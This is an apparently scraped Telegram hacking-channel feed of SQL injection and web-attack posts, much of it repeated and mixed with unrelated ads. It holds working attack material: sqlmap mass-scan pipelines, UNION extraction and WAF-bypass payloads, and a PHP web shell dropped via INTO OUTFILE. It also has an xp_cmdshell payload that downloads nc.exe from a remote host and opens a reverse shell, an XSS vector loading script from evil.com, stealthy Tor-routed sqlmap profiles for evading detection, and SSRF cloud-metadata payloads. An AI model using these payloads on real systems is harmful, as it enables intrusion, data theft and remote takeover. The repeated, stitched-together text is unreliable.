Metode untuk mencari kerentanan Sqli :
Command Line Tools Like a Pro
1.
2.
3.
4.
5.
#sqli #sql
Command Line Tools Like a Pro
1.
sublist3r -d target | tee -a domains.txt
2.
cat domains.txt | httpx | tee -a alive.txt
3.
cat alive.txt | waybackurls | tee -a urls.txt
4.
gf sqli urls >> sqli.txt
5.
sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent
#sqli #sql
β€5π₯2π2π1
π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the
database:
Now, to determine if there is Union π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
The following query is sent to the database:
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
default request
default request
default request
not same as Default
So we understand that we have 3 columns
Now with:
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
Test 1:
Test 2:
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
same as default request
same as default request
same as default request
not same as Default
So we understand that we have 3 columns
Now with:
#sqli
ππ»
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1- To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2- To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the
database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union π Union based:
Look, when you make a request to a URL, there are three modes: (if it interacts with SQL)
1_ To return an answer to you
(For example, when buying from a bookstore, it will tell you how many of these books are available)
2_ To return a result of the answer to you
(For example, in the same example above, instead of telling you the number, just tell you whether this book is available or not)
3- That no result comes back to you.
(For example, you sent a GET or POST request and now the website asks you to allow it to save ip, cookie, user agent, .. otherwise you will not be allowed to work with the site.
How do we know if we have a union?
If the URL is:
https://site.com?news=22
The following query is sent to the database:
select * from news where news_id = $newsid;
select * from news where news_id = '$newsid';
select * from news where news_id = "$newsid";
Now, to determine if there is Union or not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if:
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 # same as
default request
page/?id=54 order by 2 # same as
default request
page/?id=54 order by 3 # same as
default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLIor not, we have:
With order by, you can extract the number of columns in a database.
Default request:
page/?id=54
Test 1:
page/?id=54 order by 1
page/?id=54' order by 1 #
page/?id=54" order by 1 #
Test 2:
page/?id=54 order by 1000
page/?id=54' order by 1000#
page/?id=54" order by 1000#
Above if
Default == Test 1
And also
Test 1 != Test 2
We understand that we have Union (:
Now how to extract the information?
The first step is to get the number of columns
And we can find as follows:
page/?id=54 order by 1 #
same as default request
page/?id=54 order by 2 #
same as default request
page/?id=54 order by 3 #
same as default request
page/?id=54 order by 4 #
not same as Default
So we understand that we have 3 columns
Now with:
page/?id=54 union select 1,2,3 #
#sqli
ππ»
Salesforce
Salesforce UK: The #1 AI CRM
Salesforce is the #1 AI CRM, helping companies become Agentic Enterprises where humans and agents drive success together through a unified AI, data, and Customer 360 platform.
π2β€1
We can find the column that returns to us and run our own payloads in it to get data:
For example, to get the database name:
(if it returns the third column)
To get the tables of a database:
To get the columns of a database and a table:
And to get data, we have a column:
#SQLI
For example, to get the database name:
(if it returns the third column)
page/?id=54 union select 1,2,database()#
To get the tables of a database:
page/?id=54 UNION SELECT table_name FROM information_schema.tables WHERE table_schema = 'your_database_name' --
To get the columns of a database and a table:
UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'your_table_name' AND table_schema = 'your_database_name' --
And to get data, we have a column:
UNION SELECT your_column_name FROM your_table_name LIMIT 1 OFFSET 0 --
#SQLI
π2
π» Disclosed vulnerabilities with bug bounty
1οΈβ£ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2οΈβ£ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3οΈβ£ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
1οΈβ£ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2οΈβ£ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3οΈβ£ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
β€7π3π2
ExploitQuest
Photo
ββπ About bypassing protection against SQL injections
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
or by adding specific comments like
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
( 'AND'1'=1*1 instead of 'AND'1'='1' )
or by adding specific comments like
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
and much more.
For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
β€6π₯3
π Transition from SQL injection to shell or backdoor
β«οΈUse the βinto outfileβ command to write to a file:
β«οΈCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
β«οΈreverse netcat shell via mssql injection when xp_cmdshell is available:
#web #sqli
β«οΈUse the βinto outfileβ command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
β«οΈCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
β«οΈreverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
π₯4β€1
After exploiting sql injection using the following email address
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages ββdeviate a little from what characters can be used.
So, the next magic:
It will validate and legally return an email with the attack vector:
And how the developers display it further is a separate question.
#sqli
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages ββdeviate a little from what characters can be used.
So, the next magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);βIt will validate and legally return an email with the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question.
#sqli
π₯5π1
π Find SQL injection on the site with one command
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
#web #sqli
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
π11
Finding SQL Injection Vulnerabilities in Multiple Ways with Examples + Achieving RCE via SQLi
SQL Injection (SQLi) is one of the most critical web vulnerabilities, allowing an attacker to manipulate database queries, extract sensitive data, modify records, or even execute system commands (RCE - Remote Code Execution).
This article will explore multiple ways to detect SQLi vulnerabilities with practical examples and then demonstrate how SQLi can lead to RCE.
ββββββββββββββββββ
1. Discovering SQL Injection Vulnerabilities in Multiple Ways
πΉMethod 1: Manual Testing with Special Characters
The simplest way to test for SQL Injection is by inserting special characters such as:
'
"
--
#
;
Example 1: Injecting a Single Quote
'
If a website has a login page like:
https://example.com/login.php?user=admin
Try entering:
https://example.com/login.php?user=admin'
If an error appears like:
You have an error in your SQL syntax...
It indicates an SQL Injection vulnerability.
ββββββββββββββββββ
πΉMethod 2: Injecting Simple SQL Queries
If the backend SQL query looks like this:
SELECT * FROM users WHERE username = '$user' AND password = '$pass'
You can try the following payloads:
admin' --
or
' OR '1'='1' --
If you gain access without entering a password, the application is vulnerable.
ββββββββββββββββββ
πΉ Method 3: Using SQLMap for Automated Testing
πΉ SQLMap is a powerful tool for automated SQL Injection detection. Run:
sqlmap -u "https://example.com/login.php?user=admin" --dbs
SQLMap will analyze the URL and extract the database names if vulnerable.
ββββββββββββββββββ
πΉMethod 4: Testing with SQL Sleep (Time-Based SQLi)
If error messages are hidden, you can test for Time-Based SQLi:
https://example.com/page?id=1' AND SLEEP(5) --
If the page takes 5 seconds to load, the database is likely vulnerable.
ββββββββββββββββββ
πΉMethod 5: Data Extraction via UNION-Based SQL Injection
If a website displays data from a database, try injecting a UNION SELECT query:
https://example.com/page?id=1 UNION SELECT 1,2,3,4 --
If numbers or unexpected data appear, the website is vulnerable.
ββββββββββββββββββ
2. Escalating SQL Injection to RCE (Remote Code Execution)
If SQL Injection allows file operations via LOAD_FILE() or OUTFILE, you can execute commands on the server.
πΉExample: Uploading a Web Shell via SQLi
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
Now, access the shell through:
http://target.com/shell.php?cmd=whoami
πΉIf SQL Server has xp_cmdshell enabled, execute system commands like:
EXEC xp_cmdshell 'whoami';
This will return the current system user running the database service.
ββββββββββββββββββ
3. Exploiting SQL Injection to Gain Admin Access
In some cases, SQLi can be used to escalate privileges by modifying session data:
UPDATE users SET is_admin = 1 WHERE username = 'victim';
Or steal an admin session:
SELECT session_id FROM users WHERE username = 'admin';
π‘ Conclusion
β’Test manually using ' and OR 1=1
β’Use SQLMap for automatic SQLi detection
β’Escalate SQLi to RCE if the system allows file operations
β’Test SQL Sleep (Time-Based Injection) for hidden errors
β’Use UNION SELECT to extract sensitive data
ββββββββββββββββββ
π Join now
[https://t.me/ExploitQuest]
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE #Malware #ReverseEngineering
Telegram
ExploitQuest
contact: @ExploitQuestbot
π11β€6
CORS one liner command exploiter
This is an extremely helpful and practical Cheatsheet for Bug Hunters, which helps you find CORS missconfiguration in every possible method. Simply replace https://example.com with the URL you want to target. This will help you scan for CORS vulnerability without the need of an external tool. What you have to do is to copy-and-paste the commands into your terminal and finger crossed for any possible CORS.
Github
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
GitHub
GitHub - kleiton0x00/CORS-one-liner: A one liner Bash command which finds CORS in every possible endpoint.
A one liner Bash command which finds CORS in every possible endpoint. - kleiton0x00/CORS-one-liner
π5π5
Changing HTTP Request Methods and Their Security Impact
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
ββββββββββββββββββ
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
β’Database credentials.
β’Environment variables.
β’File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
ββββββββββββββββββ
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
The server might respond with:
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
When we send a GET request to a website like site.com, we usually receive an HTML page or another expected response.
But what happens if we change the request method to POST, PUT, or DELETE?
This can lead to different reactions from the server, such as:
1-Rejecting the request and returning 405 Method Not Allowed.
2-Processing the request in an
unexpected way, potentially causing errors or data leaks.
3-In rare cases, this can lead to
severe security vulnerabilities, such as Remote Code Execution (RCE).
ββββββββββββββββββ
Impact on Web Frameworks (e.g., Laravel)
Some web frameworks, like Laravel, return sensitive information when an error occurs, especially if debug mode is enabled. Changing the request method unexpectedly may trigger errors that expose:
β’Database credentials.
β’Environment variables.
β’File paths and internal configurations.
In some cases, improper handling of user input can even lead to RCE vulnerabilities, allowing an attacker to execute commands on the server.
ββββββββββββββββββ
Practical Examples
Example 1: 405 Error When Changing Method
Trying to send a POST request to an endpoint that only allows GET:
curl -X POST http://example.com/
The server might respond with:
HTTP/1.1 405 Method Not Allowed
Example 2: Internal Error Due to Unexpected Request
If a server encounters an error when
processing an unexpected request method, it might return:
HTTP/1.1 500 Internal Server Error
In Laravel, if APP_DEBUG=true, it might expose sensitive details like:
SQLSTATE[HY000] [1045] Access denied for user 'root'@'localhost'
This could reveal database credentials or configuration files.
Example 3: RCE Exploitation in Laravel
If an application uses eval() or system() with unsanitized user input, an attacker may be able to execute system commands by altering the request:
curl -X DELETE http://example.com/delete_user --data "id=1; system('whoami');"
If the server is not properly filtering input, it may execute the whoami command and return the server's user name.
#SQLi #XSS #RCE #LFI #WebSecurity #Exploit #CVE
π5π₯2β€1
A Simple Yet Effective Way to Find SQLI Vulnerabilities
Sometimes, simple methods work best when hunting for SQL injection (SQLI) vulnerabilities. Hereβs an optimized approach:
1. Extract Potential Targets
Use Wayback Machine URLs to find historical URLs with parameters:
waybackurls --dates target.com | grep '?id='
This helps identify pages that may still be vulnerable.
ββββββββββββββββββ
2. Test for SQLI Sleep-Based Vulnerabilities
Use the following payload:
if(now()=sysdate(),SLEEP(8),0)
If the response is delayed by ~8 seconds, the parameter is likely injectable.
ββββββββββββββββββ
3. Manual Testing with cURL
curl -X GET "https://target.com/page.php?id=1" --data-urlencode "id=1' OR if(now()=sysdate(),SLEEP(8),0) -- -" -H "X-Forwarded-For: 127.0.0.1"
β’The X-Forwarded-For header may help bypass basic IP-based WAF restrictions.
β’Modify headers like User-Agent to mimic real traffic.
ββββββββββββββββββ
4. Automated Testing with Ghauri (Bypassing WAFs)
ghauri -u "https://target.com/page.php?id=1" --timeout=30 --delay=5 --technique=BEST --level=3 --prefix="/**/" --suffix="-- -" --safe-chars="[]" --random-agent --ignore-code=403
--timeout=30: Sets the request timeout to 30 seconds.
--delay=5: Adds a 5-second delay between requests to avoid detection.
--technique=BEST: Uses the most effective SQL injection techniques.
--level=3: Performs more advanced tests for better detection.
--prefix="/**/": Adds a comment prefix to bypass WAF filters.
--suffix="-- -": Ends the payload with a SQL comment to evade detection.
--safe-chars="[]": Prevents certain characters from being URL-encoded.
--random-agent: Uses a random User-Agent to avoid fingerprinting.
--ignore-code=403: Ignores 403 Forbidden responses to continue scanning.
ββββββββββββββββββ
5. Advanced Testing with SQLMap
sqlmap -u "https://target.com/page.php?id=1" --batch --random-agent --tamper="between,space2comment,charencode" --timeout=15 --time-sec=8 --level=5 --risk=3
--random-agent: Uses random user-agents to avoid detection.
--tamper: Applies obfuscation techniques to evade WAFs.
--risk=3 --level=5: Enables deep scanning with advanced payloads.
ββββββββββββββββββ
Conclusion
β Wayback Machine helps find old endpoints.
β Manual payloads help confirm basic SQL injection.
β Ghauri & SQLMap provide automation with WAF bypass techniques.
ββββββββββββββββββ
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
Telegram
ExploitQuest
contact: @ExploitQuestbot
β€8π2π₯1
These commands and URLs are used for gathering and analyzing data about a specific domain (example.com in this case).
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
β’This query retrieves all archived URLs of example.com from Wayback Machine.
β’*.example.com/* searches for all subdomains and pages.
β’collapse=urlkey removes duplicate URLs.
β’output=text formats the output as
plain text.
β’fl=original extracts only the original URLs without extra metadata.
ββββββββββββββββββ
Explanation:
β’Retrieves a security report for example.com from VirusTotal.
β’This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
β’Replace YOUR_API_KEY with a valid VirusTotal API key.
ββββββββββββββββββ
Explanation:
β’Queries AlienVault OTX for URLs associated with domain.com.
β’limit=500 retrieves up to 500 URLs per page.
β’page=1 fetches the first page of results.
ββββββββββββββββββ
Explanation:
β’Fetches all archived URLs of example.com from Wayback Machine.
β’Saves the output to out.txt for further processing.
ββββββββββββββββββ
Explanation:
1-cat out.txt β Reads the archived URLs from out.txt.
2-uro β Deduplicates and normalizes URLs.
3-grep -E β Uses regular expressions (regex) to extract potentially sensitive files, such as:
β’Database files: .sql, .db, .backup
β’Documents: .xls, .xlsx, .doc, .pdf, .txt
β’Compressed archives: .zip, .tar.gz, .rar, .7z
β’Encryption keys: .pem, .crt, .key, .asc
β’Configuration files: .config, .ini, .yaml, .yml
β’Executable files: .exe, .dll, .apk, .msi
ββββββββββββββββββ
π Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
The goal is to identify exposed files, sensitive information, and security-related data. Here's a breakdown:
1οΈβ£ Using Archive.org to Find Archived URLs
URL:
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
Explanation:
β’This query retrieves all archived URLs of example.com from Wayback Machine.
β’*.example.com/* searches for all subdomains and pages.
β’collapse=urlkey removes duplicate URLs.
β’output=text formats the output as
plain text.
β’fl=original extracts only the original URLs without extra metadata.
ββββββββββββββββββ
2οΈβ£ Using VirusTotal to Get a Domain Report
URL:
https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=example.com
Explanation:
β’Retrieves a security report for example.com from VirusTotal.
β’This report includes:
Blacklist status
Malicious activities detected
Known associated malicious URLs
β’Replace YOUR_API_KEY with a valid VirusTotal API key.
ββββββββββββββββββ
3οΈβ£ Using AlienVault OTX to Fetch URLs Related to a Domain
URL:
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
Explanation:
β’Queries AlienVault OTX for URLs associated with domain.com.
β’limit=500 retrieves up to 500 URLs per page.
β’page=1 fetches the first page of results.
ββββββββββββββββββ
4οΈβ£ Using curl to Fetch Archived URLs and Save Them to a File
Command:
curl -G "https://web.archive.org/cdx/search/cdx" \
--data-urlencode "url=*.example.com/*" \
--data-urlencode "collapse=urlkey" \
--data-urlencode "output=text" \
--data-urlencode "fl=original" > out.txt
Explanation:
β’Fetches all archived URLs of example.com from Wayback Machine.
β’Saves the output to out.txt for further processing.
ββββββββββββββββββ
5οΈβ£ Extracting Sensitive Files Using uro and grep
Command:
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Explanation:
1-cat out.txt β Reads the archived URLs from out.txt.
2-uro β Deduplicates and normalizes URLs.
3-grep -E β Uses regular expressions (regex) to extract potentially sensitive files, such as:
β’Database files: .sql, .db, .backup
β’Documents: .xls, .xlsx, .doc, .pdf, .txt
β’Compressed archives: .zip, .tar.gz, .rar, .7z
β’Encryption keys: .pem, .crt, .key, .asc
β’Configuration files: .config, .ini, .yaml, .yml
β’Executable files: .exe, .dll, .apk, .msi
ββββββββββββββββββ
π Summary:
These commands help in discovering and analyzing sensitive files that might be publicly accessible by:
1-Fetching archived URLs from Wayback Machine.
2-Checking for malicious activity on VirusTotal and AlienVault.
3-Filtering sensitive files using grep and uro.
[https://t.me/ExploitQuest]
#BugBounty #SQLi #SQLInjection #PenTesting #CyberSecurity #EthicalHacking #InfoSec #RedTeam #WebSecurity #Hacking #BugHunter #WAFBypas
β€6π5
Server-Side Request Forgery (SSRF) is a powerful vulnerability that occurs when a server fetches external resources based on user input. If exploited, it can lead to data leakage, access to internal systems, or even full infrastructure compromise.
Hereβs a step-by-step guide to discovering and exploiting SSRF vulnerabilities:
ββββββββββββββββββ
Start by locating areas where the application sends outbound requests. Common sources include:
If HTML or external content is processed, injecting a malicious URL can trick the server into making a request to your controlled endpoint.
Example:
<img src="http://attacker.com/payload"/>
ββββββββββββββββββ
Test the serverβs behavior by sending malformed URLs and observe the error responses:
These clues indicate whether the server is trying to make external requests.
Test Payloads:
http://invalid-url
http://example.local
http://127.0.0.1:9999
ββββββββββββββββββ
Once confirmed, aim for internal IP ranges such as:
These often expose admin panels, internal APIs, or development services. Port scanning via SSRF is also possible by analyzing different response behaviors.
Example:
http://127.0.0.1:8000/admin
ββββββββββββββββββ
In cloud environments (AWS, Azure, GCP), internal metadata endpoints may leak sensitive info like access keys and tokens.
Payloads:
http://169.254.169.254/latest/meta-data
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Be sure to include necessary headers if required (e.g., Metadata: true for Azure).
ββββββββββββββββββ
If filters are in place, use bypass techniques:
http://127%2E0%2E0%2E1
http://2130706433 (equals 127.0.0.1)
http://[::]
Pro Tip: Use DNS rebinding or SSRF chaining with redirect-capable endpoints.
ββββββββββββββββββ
In blind SSRF cases, you wonβt get visible feedback. Use external monitoring tools to detect interactions:
Example:
http://your-collaborator-url.com
Monitor for DNS or HTTP logs to confirm server-side interaction.
ββββββββββββββββββ
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
Attacker
Attacker - The Domain Name Attacker.com is Now For Sale.
Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.
π₯5β€3π1π₯°1
Hereβs a powerful list of π» SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate-limits, or intrusion detection systems (IDS/IPS).
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.
β
1. Stealth Mode (WAF Bypass + Delay)
π Use Case: Slow, stealthy testing to avoid WAF/IPS.
ββββββββββββββββββ
β
2. Aggressive Mode with WAF Evasion
π Use Case: For deeper exploitation when stealth is less critical.
ββββββββββββββββββ
β
3. Blind Time-Based SQLi Detection
π Use Case: For blind injections using SLEEP, benchmark, or pg_sleep.
ββββββββββββββββββ
β
4. Obfuscated Payloads for Bypassing WAFs
π Use Case: When facing intelligent WAFs that detect classic patterns.
ββββββββββββββββββ
β
5. POST Parameter Injection with Custom Headers
π Use Case: Bypassing login forms and tricking WAFs using header spoofing.
ββββββββββββββββββ
β
6. Using TOR with WAF Evasion
π Use Case: Anonymous testing through TOR while bypassing WAF.
ββββββββββββββββββ
π§ Recommended Tamper Scripts
π‘ Bonus: Create a Custom Profile Alias
You can create a .sqlmap_profile file to reuse flags:
Then run:
That's all, friends!
Happy hacking and see you next time!π
#BugBounty
#ssrf
#sqli
#bypass
These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,between,charunicodeescape \
--delay=2 --timeout=10 \
--retries=5 \
--threads=1 \
--technique=BEUSTQ \
--level=3 --risk=2
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
--level=5 --risk=3 \
--batch --threads=5 \
--technique=BEUSTQ
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,modsecurityversioned,between \
--technique=T \
--time-sec=5 \
--level=5 --risk=3 \
--batch
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
--random-agent \
--level=5 --risk=3 \
--threads=1 --delay=1 \
--batch
ββββββββββββββββββ
sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=1234" \
--method=POST \
--headers="X-Forwarded-For: 127.0.0.1" \
--random-agent \
--tamper=space2comment,charunicodeescape \
--level=5 --risk=3 \
--batch
ββββββββββββββββββ
sqlmap -u "http://target.com/page.php?id=1" \
--tor --tor-type=SOCKS5 --check-tor \
--random-agent \
--delay=2 --timeout=10 \
--tamper=space2comment,charunicodeescape,modsecurityversioned \
--batch
ββββββββββββββββββ
| Tamper Script | Description
| ---------------------- | -------------------------------------------
| `space2comment` | Replaces spaces with comments (`/**/`)
| `charunicodeescape` | Unicode-escapes payload characters
| `randomcase` | Randomizes keyword casing
| `between` | Obfuscates `WHERE` conditions
| `versionedkeywords` | Adds versioned comments before SQL keywords
| `equaltolike` | Replaces `=` with `LIKE`
| `unmagicquotes` | Bypasses magic quotes
| `modsecurityversioned` | Targets ModSecurity WAF bypass
You can create a .sqlmap_profile file to reuse flags:
# ~/.sqlmap_profile
--random-agent
--tamper=space2comment,charunicodeescape
--level=5
--risk=3
--threads=1
--delay=1
--timeout=10
--retries=3
--technique=BEUSTQ
Then run:
sqlmap -u "http://target.com/page.php?id=1" @~/.sqlmap_profile
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
β€11π₯4π₯°1
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://target.com
Analyze JavaScript files for hidden secrets, tokens, or API endpoints
Discover hidden or forgotten pages like /admin, /test, etc. π΅οΈ
Search HTML comments for sensitive dev notes
Browse and inspect the full site locally without triggering WAFs or rate limits
grep -Ri "<!--" target.com
# Developer comments
grep -Ri "api" target.com
# API endpoints
python3 LinkFinder.py -i index.html -o cli
That's all, friends!
Happy hacking and see you next time!
#BugBounty
#ssrf
#sqli
#bypass
#wget
Please open Telegram to view this post
VIEW IN TELEGRAM
Target
Target : Expect More. Pay Less.
Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.
π₯4β€2π₯°2
β API Authentication Bypass
Let's assume we have a vulnerable API endpoint:
The API uses JSON Web Tokens (JWT) for authentication. We can use a tool like
Step 1: Intercept JWT Token
Using Burp Suite, intercept the login request and capture the JWT token:
Response:
Step 2: Analyze JWT Token
Using a tool like
Step 3: Bypass Authentication
We can use a tool like
